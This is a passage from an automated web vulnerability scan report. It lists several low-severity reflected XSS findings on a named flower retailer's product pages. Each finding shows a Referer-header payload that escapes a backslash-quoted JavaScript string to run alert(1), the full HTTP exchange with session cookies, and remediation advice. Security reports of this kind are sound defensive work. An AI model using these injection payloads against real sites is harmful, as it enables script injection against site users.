Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /roses/12-Candy-Cane-Roses-30045610 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6a601\"%3balert(1)//0f3b7296fd4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=ql1j4czqembdxb4xviwynnqs; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=ql1j4czqembdxb4xviwynnqs; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pjt-1,cnd-33,pvo-1,pbr-3,psk-2,pps-1,poe-2,zzc-1,pjs-3,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-1,nte-3,ntc-1,peo-1,pfp-1,phr-2,zza-2,psv-4,nta-1,ntb-1,pmo-1,ppr-2,spg-1,xpc-1,psr-2,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:44 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:44 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=55; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:44 GMT; path=/
Set-Cookie: PFC_BrowserId=a4400e3a-d551-40f4-87b1-90a5cf22dcd0; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30045610&12/16/2010 11:56:46 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:56:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:56:47 GMT
Connection: close
Content-Length: 195298


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30045610","30045610","30045610","397472","55","organicgglgeneric_6a601\\";alert(1)//0f3b7296fd4","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pfl-2,cnd-33,pvo-1,pbr-3,pcy-7,psk-2,poe-2,zzc-1,pjs-3,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-1,nte-3,ntc-1,peo-1,pfp-1,phr-2,pjt-1,psv-4,
...[SNIP]...

2.163. http://products.proflowers.com/roses/One-Dozen-Assorted-Christmas-Lights-Roses--12-FREE-6338 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /roses/One-Dozen-Assorted-Christmas-Lights-Roses--12-FREE-6338

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b876\"%3balert(1)//62707b61057 was submitted in the Referer HTTP header. This input was echoed as 1b876\\";alert(1)//62707b61057 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /roses/One-Dozen-Assorted-Christmas-Lights-Roses--12-FREE-6338 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1b876\"%3balert(1)//62707b61057

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=koozfzkgnfxbdv05zhv14zlg; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=koozfzkgnfxbdv05zhv14zlg; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pjt-2,cnd-30,pvo-1,pbr-4,psk-2,pps-2,poe-2,zzc-2,pjs-1,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-2,peo-1,pfp-1,phr-2,zza-2,psv-4,nta-2,ntb-1,pmo-1,ppr-1,spg-2,xpc-1,psr-2,pcy-8,zzb-1,gfr-2,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:13 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:13 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=103; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:13 GMT; path=/
Set-Cookie: PFC_BrowserId=aa823ab6-38a8-41b6-8f19-0d4e86f7212d; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=6338&12/16/2010 11:56:15 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:56:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:56:15 GMT
Connection: close
Content-Length: 134487


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
lendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("6338","6338","6338","325555","103","organicgglgeneric_1b876\\";alert(1)//62707b61057","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pfl-1,cnd-30,pvo-1,pbr-4,pcy-8,psk-2,poe-2,zzc-2,pjs-1,pcu-1,spg-2,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-2,peo-1,pfp-1,phr-2,pjt-2,psv-4,
...[SNIP]...

2.164. http://products.proflowers.com/roses/One-Dozen-Assorted-Christmas-Lights-Roses-40794 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /roses/One-Dozen-Assorted-Christmas-Lights-Roses-40794

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4558a\"%3balert(1)//b45874befa4 was submitted in the Referer HTTP header. This input was echoed as 4558a\\";alert(1)//b45874befa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /roses/One-Dozen-Assorted-Christmas-Lights-Roses-40794 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4558a\"%3balert(1)//b45874befa4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=hm0nbitgto2qkkoonporztzn; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=hm0nbitgto2qkkoonporztzn; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-2,cnd-33,pvo-2,pbr-3,psk-2,pps-1,poe-1,zzc-1,pjs-2,pcu-1,pfl-2,mpsmediapersonalitysplit-2,ntd-2,nte-1,ntc-2,peo-2,pfp-1,phr-2,zza-1,psv-3,nta-1,ntb-1,pmo-1,ppr-2,spg-2,xpc-1,psr-2,pcy-5,zzb-2,gfr-2,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:16 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:16 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=110; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:16 GMT; path=/
Set-Cookie: PFC_BrowserId=5dc8f81a-0972-47c5-b5e7-7935d7605eb8; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=40794&12/16/2010 11:56:20 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:56:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:56:20 GMT
Connection: close
Content-Length: 209903


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
darOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("40794","40794","40794","248680","110","organicgglgeneric_4558a\\";alert(1)//b45874befa4","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-2,cnd-33,pvo-2,pbr-3,pcy-5,psk-2,poe-1,zzc-1,pjs-2,pcu-1,spg-2,mpsmediapersonalitysplit-2,ntd-2,nte-1,ntc-2,peo-2,pfp-1,phr-2,pjt-2,psv-3,
...[SNIP]...

2.165. http://products.proflowers.com/roses/One-Dozen-Long-Stemmed-Pink-Roses-1016 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /roses/One-Dozen-Long-Stemmed-Pink-Roses-1016

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1ce2\"%3balert(1)//12e18abeff3 was submitted in the Referer HTTP header. This input was echoed as c1ce2\\";alert(1)//12e18abeff3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /roses/One-Dozen-Long-Stemmed-Pink-Roses-1016 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c1ce2\"%3balert(1)//12e18abeff3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=l3njn1zdu5kyrpaikdw1ligl; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=l3njn1zdu5kyrpaikdw1ligl; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-1,cnd-34,pvo-2,pbr-3,psk-2,pps-1,poe-2,zzc-1,pjs-3,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-2,nte-1,ntc-2,peo-2,pfp-1,phr-1,zza-1,psv-4,nta-1,ntb-2,pmo-1,ppr-1,spg-2,xpc-1,psr-1,pcy-6,zzb-2,gfr-1,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:26 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:26 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=28; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:26 GMT; path=/
Set-Cookie: PFC_BrowserId=65cea820-0e0e-47a4-a42d-b7818aca36e9; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=1016&12/16/2010 11:56:27 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:56:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:56:28 GMT
Connection: close
Content-Length: 196656


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
alendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("1016","1016","1016","326897","28","organicgglgeneric_c1ce2\\";alert(1)//12e18abeff3","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-1,cnd-34,pvo-2,pbr-3,pcy-6,psk-2,poe-2,zzc-1,pjs-3,pcu-1,spg-2,mpsmediapersonalitysplit-1,ntd-2,nte-1,ntc-2,peo-2,pfp-1,phr-1,pjt-1,psv-4,
...[SNIP]...

2.166. http://products.proflowers.com/roses/One-Dozen-Long-Stemmed-Red-Roses-503 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /roses/One-Dozen-Long-Stemmed-Red-Roses-503

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9671\"%3balert(1)//809cc07fb99 was submitted in the Referer HTTP header. This input was echoed as d9671\\";alert(1)//809cc07fb99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /roses/One-Dozen-Long-Stemmed-Red-Roses-503 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d9671\"%3balert(1)//809cc07fb99

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=yd00mg41zznnyr10qjkpgdcw; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=yd00mg41zznnyr10qjkpgdcw; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-2,cnd-33,pvo-1,pbr-4,psk-1,pps-2,poe-2,zzc-1,pjs-1,pcu-1,pfl-1,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-2,peo-1,pfp-2,phr-2,zza-2,psv-3,nta-2,ntb-2,pmo-1,ppr-1,spg-2,xpc-1,psr-1,pcy-7,zzb-1,gfr-2,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:32 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:32 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=123; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:32 GMT; path=/
Set-Cookie: PFC_BrowserId=7269fb21-b299-4409-a09a-f0b2616d84fa; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=503&12/16/2010 11:56:33 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:56:33 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:56:34 GMT
Connection: close
Content-Length: 194992


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
dCalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("503","503","503","327071","123","organicgglgeneric_d9671\\";alert(1)//809cc07fb99","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-1,cnd-33,pvo-1,pbr-4,pcy-7,psk-1,poe-2,zzc-1,pjs-1,pcu-1,spg-2,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-2,peo-1,pfp-2,phr-2,pjt-2,psv-3,
...[SNIP]...

2.167. http://products.proflowers.com/roses/One-Dozen-Long-Stemmed-Yellow-Roses-41197 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /roses/One-Dozen-Long-Stemmed-Yellow-Roses-41197

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37f37\"%3balert(1)//6f1e2757247 was submitted in the Referer HTTP header. This input was echoed as 37f37\\";alert(1)//6f1e2757247 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /roses/One-Dozen-Long-Stemmed-Yellow-Roses-41197 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=37f37\"%3balert(1)//6f1e2757247

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=ske2m5p2e2mupgkhs1ix4b0n; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=ske2m5p2e2mupgkhs1ix4b0n; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pjt-2,cnd-30,pvo-2,pbr-4,psk-1,pps-2,poe-2,zzc-1,pjs-1,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-1,peo-1,pfp-1,phr-2,zza-1,psv-4,nta-1,ntb-1,pmo-1,ppr-1,spg-1,xpc-1,psr-1,pcy-8,zzb-2,gfr-2,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:32 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:32 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=99; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:32 GMT; path=/
Set-Cookie: PFC_BrowserId=fcd03e65-283a-49e0-ba72-0076e687d204; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=41197&12/16/2010 11:56:34 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:56:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:56:35 GMT
Connection: close
Content-Length: 127669


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("41197","41197","41197","327092","99","organicgglgeneric_37f37\\";alert(1)//6f1e2757247","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pfl-2,cnd-30,pvo-2,pbr-4,pcy-8,psk-1,poe-2,zzc-1,pjs-1,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-1,peo-1,pfp-1,phr-2,pjt-2,psv-4,
...[SNIP]...

2.168. http://products.proflowers.com/roses/Two-Dozen-Long-Stemmed-Red-Roses-504 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /roses/Two-Dozen-Long-Stemmed-Red-Roses-504

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b69d3\"%3balert(1)//24889ffafa8 was submitted in the Referer HTTP header. This input was echoed as b69d3\\";alert(1)//24889ffafa8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /roses/Two-Dozen-Long-Stemmed-Red-Roses-504 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b69d3\"%3balert(1)//24889ffafa8

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=qmir5udu3usija3hrrdujcad; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=qmir5udu3usija3hrrdujcad; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-1,cnd-30,pvo-1,pbr-3,psk-1,pps-2,poe-1,zzc-1,pjs-3,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-1,nte-1,ntc-1,peo-1,pfp-2,phr-2,zza-1,psv-3,nta-1,ntb-2,pmo-1,ppr-1,spg-2,xpc-1,psr-1,pcy-6,zzb-1,gfr-1,apg-2,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:37 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:37 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=128; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:37 GMT; path=/
Set-Cookie: PFC_BrowserId=fe0f979d-25fa-47f5-9f13-62c08845b4a1; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=504&12/16/2010 11:56:40 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:56:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:56:40 GMT
Connection: close
Content-Length: 131840


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
